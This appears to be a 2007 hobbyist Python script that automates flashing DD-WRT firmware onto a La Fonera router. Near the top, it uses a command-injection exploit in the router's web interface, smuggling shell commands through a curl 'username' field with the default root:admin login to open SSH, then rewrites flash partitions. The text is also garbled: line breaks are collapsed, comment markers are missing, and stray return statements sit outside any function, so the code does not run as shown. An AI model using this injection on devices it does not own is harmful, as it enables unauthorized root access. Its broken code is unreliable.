#!/usr/bin/env python # #Fonera DD-WRT Autoflash #03-29-2007 #By:Coldsteal #http://i-trash.org #Pexpect-http://pexpect.sourceforge.net import pexpect, os, time, socket iface=raw_input("Ethernet card (eg eth0): ") print "Change IP to 169.254.255.2, subnet 255.255.255.0\n\n" os.system('ifconfig '+iface+' down;ifconfig '+iface+' 169.254.255.2 netmask 255.255.255.0 broadcast 169.254.255.255 up') time.sleep(1) #WGET FILES rootfs="http://www.dd-wrt.com/dd-wrtv2/down.php?path=downloads/beta releases/fonera builds/2007 - 0323/&download=root.fs" vmlinux="http://www.dd-wrt.com/dd-wrtv2/down.php?path=downloads/beta releases/fonera builds/2007 - 0323/&download=vmlinux.bin.l7" openwrt_vmlinux="http://fonera.info/camicia/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma" out="http://fonera.info/camicia/out.hex" os.system("wget --output-document=root.fs "+rootfs) os.system("wget --output-document=vmlinux.bin.l7 "+vmlinux) os.system("wget "+openwrt_vmlinux) os.system("wget "+out) time.sleep(1) #WEBSERVER os.system("python -c \"import SimpleHTTPServer;SimpleHTTPServer.test()\" &") time.sleep(1) #0.7.1 r1 exploit print "0.7.1 r1 enable ssh" os.system("curl --user root:admin -d username='$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)' http://169.254.255.1/cgi-bin/webif/connection.sh") time.sleep(1) os.system("curl --user root:admin -d username='$(/etc/init.d/dropbear)' http://169.254.255.1/cgi-bin/webif/connection.sh") time.sleep(1) #SSH 2 print "SSH Part 1\n" ssh_newkey = 'Are you sure you want to continue connecting' child_ssh_1 = pexpect.spawn('ssh root@169.254.255.1') i = child_ssh_1.expect([pexpect.TIMEOUT, ssh_newkey, 'password: ']) if i == 0: Timeout print 'ERROR!' print 'SSH could not login. Here is what SSH said:' print child_ssh_1.before, child_ssh_1.after return None if i == 1: SSH does not have the public key. Just accept it. child_ssh_1.sendline ('yes') child_ssh_1.expect ('password: ') i = child_ssh_1.expect([pexpect.TIMEOUT, 'password: ']) if i == 0: Timeout print 'ERROR!' print 'SSH could not login. Here is what SSH said:' print child_ssh_1.before, child_ssh_1.after return None child_ssh_1.sendline('admin') return child_ssh_1 child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ', '- ', '', ' ']) child_ssh_1.sendline ('\n') child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_1.sendline ('mv /etc/init.d/dropbear /etc/init.d/S50dropbear\n') child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_1.sendline ('cat /etc/firewall.user|sed \'s:#::\'>/etc/firewall.user\n') child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_1.sendline ('cd /tmp\n') child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_1.sendline ('wget http://169.254.255.2:8000/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma\n') child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_1.sendline ('mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7\n') child_ssh_1.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_1.sendline ('reboot\n') child_ssh_1.sendline ('\n') time.sleep(1) print "please wait 4 min while Fonera reboots\n" time.sleep(240) #SSH 2 print "SSH Part 2\n" ssh_newkey_2 = 'Are you sure you want to continue connecting' child_ssh_2 = pexpect.spawn('ssh root@169.254.255.1') i = child_ssh_2.expect([pexpect.TIMEOUT, ssh_newkey_2, 'password: ']) if i == 0: Timeout print 'ERROR!' print 'SSH could not login. Here is what SSH said:' print child_ssh_2.before, child_ssh_2.after return None if i == 1: SSH does not have the public key. Just accept it. child_ssh_2.sendline ('yes') child_ssh_2.expect ('password: ') i = child_ssh_2.expect([pexpect.TIMEOUT, 'password: ']) if i == 0: Timeout print 'ERROR!' print 'SSH could not login. Here is what SSH said:' print child_ssh_2.before, child_ssh_2.after return None child_ssh_2.sendline('admin') return child_ssh_2 child_ssh_2.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ', '- ', '', ' ']) child_ssh_2.sendline ('\n') child_ssh_2.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_2.sendline ('cd /tmp\n') child_ssh_2.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_2.sendline ('wget http://169.254.255.2/out.hex\n') child_ssh_2.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_2.sendline ('mtd -e \"RedBoot config\" write out.hex \"RedBoot config\"\n') child_ssh_2.expect (['root@OpenWrt:~#', 'root@OpenWrt:~# ']) child_ssh_2.sendline ('reboot\n') child_ssh_2.sendline ('\n') time.sleep(1) print "please wait 4 min while Fonera reboots\n" time.sleep(240) print "Change IP to 192.168.1.166, subnet 255.255.255.0" os.system('ifconfig '+iface+' down;ifconfig '+iface+' 192.168.1.166 netmask 255.255.255.0 broadcast 192.168.1.255 up') time.sleep(1) #TELNET child_telnet = pexpect.spawn ('telnet 192.168.1.254 9000') child_telnet.expect (['RedBoot>', 'RedBoot> ', '', ' ']) child_telnet.sendline ('\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('ip_address -l 192.168.1.254/24 -h 192.168.1.166\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('fis init\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('load -r -v -b 0x80041000 root.fs\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('fis create -b 0x80041000 -f 0xA8030000 -l 0x002C0000 -e 0x00000000 rootfs\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('load -r -v -b 0x80041000 vmlinux.bin.l7\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('fis create -r 0x80041000 -e 0x80041000 -l 0x000E0000 vmlinux.bin.l7\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('fis create -f 0xA83D0000 -l 0x00010000 -n nvram\n') child_telnet.expect (['RedBoot>', 'RedBoot> ']) child_telnet.sendline ('reset\n') child_telnet.sendline ('\n') time.sleep(1) print "please wait 4 min while Fonera resets\n" time.sleep(240) print "Now pull the plug on the Fonera and restart it. Once it is restarted go to http://192.168.1.1 via wireless\n" time.sleep(1) print "call bash script to kill webserver and exit\n" os.system("sh kill_webserver.sh &") exit